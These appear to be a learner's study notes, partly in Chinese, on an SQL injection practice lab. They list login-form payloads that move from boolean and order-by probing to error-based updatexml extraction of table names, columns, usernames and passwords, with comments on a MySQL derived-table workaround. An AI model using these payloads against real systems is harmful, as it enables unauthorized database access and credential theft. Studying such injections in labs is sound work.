uname=admin&passwd=admin' and 1=1#&submit=Submit
uname=admin&passwd=admin' and 1=2#&submit=Submit
深刻感受到我没有学到SQL注入的精髓.
uname=admin&passwd=admin' order by 1#&submit=Submit
Unknown column '1' in 'order clause'
我很懵逼,why.....
uname=admin&passwd=admin' and (updatexml(1,concat(0x7e,(select database()),0x7e),1))#&submit=Submit #XPATH syntax error: '~security~'
uname=admin&passwd=admin' and (updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1))#&submit=Submit #XPATH syntax error: '~users~'
uname=admin&passwd=admin' and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 7,1),0x7e),1))#&submit=Submit #XPATH syntax error: '~username~'
uname=admin&passwd=admin' and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1))#&submit=Submit #XPATH syntax error: '~password~'
uname=admin&passwd=admin' and (updatexml(1,concat(0x7e,(select password from users),0x7e),1))#&submit=Submit
跪了:You can't specify target table 'users' for update in FROM clause
不能先select表中的某些值,再update这个表(在同一语句中)。
解决方法:将select出的结果作为派生表再select一遍,这样就规避了错误。
注意:此问题只出现于MySQL,msSQL和Oracle不会出现此问题。
uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select * from (select username from users limit 0,1) a),0x7e),1)#&submit=Submit #XPATH syntax error: '~Dumb~'
uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select * from (select password from users limit 0,1) a),0x7e),1)#&submit=Submit #XPATH syntax error: '~Dumb~'